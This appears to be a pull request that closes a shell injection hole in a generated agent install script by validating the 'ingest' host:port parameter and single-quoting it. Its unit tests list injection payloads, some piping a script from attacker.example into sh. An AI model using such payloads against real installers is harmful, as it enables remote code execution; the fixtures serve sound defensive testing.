### PR TITLE
fix(agent): validate install ingest address

### DIFF
--- a/apps/web/app/api/agent/install/route.ts
+++ b/apps/web/app/api/agent/install/route.ts
@@ -1,5 +1,5 @@
 import { NextRequest, NextResponse } from 'next/server'
-import { buildAgentInstallScript } from '@/lib/agent/install-script'
+import { buildAgentInstallScript, validateAgentIngestAddress } from '@/lib/agent/install-script'
 import { getAgentPublicOrigin } from '@/lib/agent/public-origin'
 import { createRateLimiter } from '@/lib/rate-limit'
 import { getClientIpFromHeaders } from '@/lib/client-ip'
@@ -41,7 +41,15 @@ export async function GET(request: NextRequest) {
 
   const { searchParams } = new URL(request.url)
   const bareHost = new URL(serverURL).hostname
-  const ingestAddress = searchParams.get('ingest') ?? `${bareHost}:9443`
+  let ingestAddress: string
+  try {
+    ingestAddress = validateAgentIngestAddress(searchParams.get('ingest') ?? `${bareHost}:9443`)
+  } catch {
+    return NextResponse.json(
+      { error: 'Invalid agent ingest address. Use host:port with a port from 1 to 65535.' },
+      { status: 400 },
+    )
+  }
   const skipVerify = searchParams.get('skip_verify') === 'true'
   const script = buildAgentInstallScript(serverURL, ingestAddress, skipVerify)
 

--- a/apps/web/lib/agent/install-script.test.mjs
+++ b/apps/web/lib/agent/install-script.test.mjs
@@ -5,6 +5,7 @@ import {
   buildAgentInstallCommand,
   buildAgentInstallScript,
   buildAgentInstallUrl,
+  validateAgentIngestAddress,
 } from './install-script.ts'
 
 test('buildAgentInstallUrl never places enrolment tokens in the installer URL', () => {
@@ -44,6 +45,37 @@ test('buildAgentInstallScript only consumes CT_OPS_ORG_TOKEN from the runtime en
   const script = buildAgentInstallScript('https://ct-ops.example.com', 'ct-ops.example.com:9443', false)
 
   assert.match(script, /if \[ -n "\$\{CT_OPS_ORG_TOKEN:-\}" \]; then/)
-  assert.match(script, /sudo env CT_OPS_ORG_TOKEN="\$CT_OPS_ORG_TOKEN" \.\/ct-ops-agent --install --address "ct-ops\.example\.com:9443"/)
+  assert.match(script, /sudo env CT_OPS_ORG_TOKEN="\$CT_OPS_ORG_TOKEN" \.\/ct-ops-agent --install --address 'ct-ops\.example\.com:9443'/)
   assert.equal(script.includes('token='), false)
+})
+
+test('validateAgentIngestAddress accepts only explicit host and port values', () => {
+  assert.equal(validateAgentIngestAddress('ct-ops.example.com:9443'), 'ct-ops.example.com:9443')
+  assert.equal(validateAgentIngestAddress('localhost:9443'), 'localhost:9443')
+  assert.equal(validateAgentIngestAddress('10.0.0.10:9443'), '10.0.0.10:9443')
+  assert.equal(validateAgentIngestAddress('[2001:db8::1]:9443'), '[2001:db8::1]:9443')
+})
+
+test('validateAgentIngestAddress rejects shell injection payloads and non-address values', () => {
+  const invalidValues = [
+    'prod:9443";curl https://attacker.example/s.sh|sh;"',
+    'prod:9443$(curl https://attacker.example/s.sh|sh)',
+    'prod:9443`id`',
+    'prod:9443;id',
+    'prod:9443\nid',
+    'prod host:9443',
+    'https://prod:9443',
+    'prod:9443/path',
+    'prod:0',
+    'prod:65536',
+    'prod',
+  ]
+
+  for (const value of invalidValues) {
+    assert.throws(
+      () => validateAgentIngestAddress(value),
+      /Invalid agent ingest address/,
+      `${value} should be rejected`,
+    )
+  }
 })

--- a/apps/web/lib/agent/install-script.ts
+++ b/apps/web/lib/agent/install-script.ts
@@ -11,6 +11,79 @@ function shellSingleQuote(value: string): string {
   return `'${value.replace(/'/g, `'\\''`)}'`
 }
 
+function validatePort(port: string): void {
+  if (!/^[0-9]{1,5}$/.test(port)) {
+    throw new Error('Invalid agent ingest address')
+  }
+
+  const portNumber = Number(port)
+  if (!Number.isInteger(portNumber) || portNumber < 1 || portNumber > 65_535) {
+    throw new Error('Invalid agent ingest address')
+  }
+}
+
+function validateDnsOrIpv4Host(host: string): void {
+  if (host.length === 0 || host.length > 253) {
+    throw new Error('Invalid agent ingest address')
+  }
+
+  if (!/^[A-Za-z0-9.-]+$/.test(host)) {
+    throw new Error('Invalid agent ingest address')
+  }
+
+  const labels = host.split('.')
+  if (labels.some((label) => label.length === 0 || label.length > 63 || label.startsWith('-') || label.endsWith('-'))) {
+    throw new Error('Invalid agent ingest address')
+  }
+
+  if (/^[0-9.]+$/.test(host) && labels.length === 4) {
+    for (const label of labels) {
+      if (!/^[0-9]{1,3}$/.test(label) || Number(label) > 255) {
+        throw new Error('Invalid agent ingest address')
+      }
+    }
+  }
+}
+
+function validateIpv6Host(host: string, port: string): void {
+  try {
+    const parsed = new URL(`https://${host}:${port}`)
+    if (parsed.hostname !== host.toLowerCase() || parsed.port !== port) {
+      throw new Error('Invalid agent ingest address')
+    }
+  } catch {
+    throw new Error('Invalid agent ingest address')
+  }
+}
+
+export function validateAgentIngestAddress(value: string): string {
+  const ipv6Match = value.match(/^(\[[0-9A-Fa-f:.]+\]):([0-9]{1,5})$/)
+  if (ipv6Match) {
+    const host = ipv6Match[1]
+    const port = ipv6Match[2]
+    if (!host || !port) {
+      throw new Error('Invalid agent ingest address')
+    }
+    validatePort(port)
+    validateIpv6Host(host, port)
+    return value
+  }
+
+  const hostPortMatch = value.match(/^([A-Za-z0-9.-]+):([0-9]{1,5})$/)
+  if (!hostPortMatch) {
+    throw new Error('Invalid agent ingest address')
+  }
+
+  const host = hostPortMatch[1]
+  const port = hostPortMatch[2]
+  if (!host || !port) {
+    throw new Error('Invalid agent ingest address')
+  }
+  validatePort(port)
+  validateDnsOrIpv4Host(host)
+  return value
+}
+
 export function buildAgentInstallCommand(
   appUrl: string,
   skipVerify: boolean,
@@ -26,6 +99,7 @@ export function buildAgentInstallScript(
   ingestAddress: string,
   skipVerify: boolean,
 ): string {
+  const safeIngestAddress = validateAgentIngestAddress(ingestAddress)
   const tlsFlag = skipVerify ? ' --tls-skip-verify' : ''
   const curlFlags = skipVerify ? '-fsSLk' : '-fsSL'
   const installPath = `/api/agent/install${skipVerify ? '?skip_verify=true' : ''}`
@@ -55,7 +129,7 @@ echo "Binary downloaded."
 
 # ── Install with runtime-provided token ───────────────────────────────────────
 if [ -n "\${CT_OPS_ORG_TOKEN:-}" ]; then
-  sudo env CT_OPS_ORG_TOKEN="\$CT_OPS_ORG_TOKEN" ./ct-ops-agent --install --address "${ingestAddress}"${tlsFlag}
+  sudo env CT_OPS_ORG_TOKEN="\$CT_OPS_ORG_TOKEN" ./ct-ops-agent --install --address ${shellSingleQuote(safeIngestAddress)}${tlsFlag}
   exit 0
 fi
 
@@ -64,6 +138,6 @@ echo "Export CT_OPS_ORG_TOKEN with an enrolment token, then rerun this command:"
 echo "  curl ${curlFlags} \\"${serverURL}${installPath}\\" | sh"
 echo ""
 echo "You can also install manually:"
-echo "  sudo ./ct-ops-agent --install --token <YOUR-TOKEN> --address ${ingestAddress}${tlsFlag}"
+echo "  sudo ./ct-ops-agent --install --token <YOUR-TOKEN> --address ${shellSingleQuote(safeIngestAddress)}${tlsFlag}"
 `
 }


### PR DESCRIPTION
## Summary
- validate agent installer `ingest` overrides as strict host:port values before rendering scripts
- reject shell metacharacters, schemes, paths, whitespace, and invalid ports with a 400 response
- render validated ingest addresses with shell single-quoting in generated install commands

Fixes #979

## Tests
- node --experimental-strip-types --test lib/agent/install-script.test.mjs
- pnpm --filter web type-check
- pnpm --filter web lint (passes with existing warnings)
- pnpm --filter web test:unit
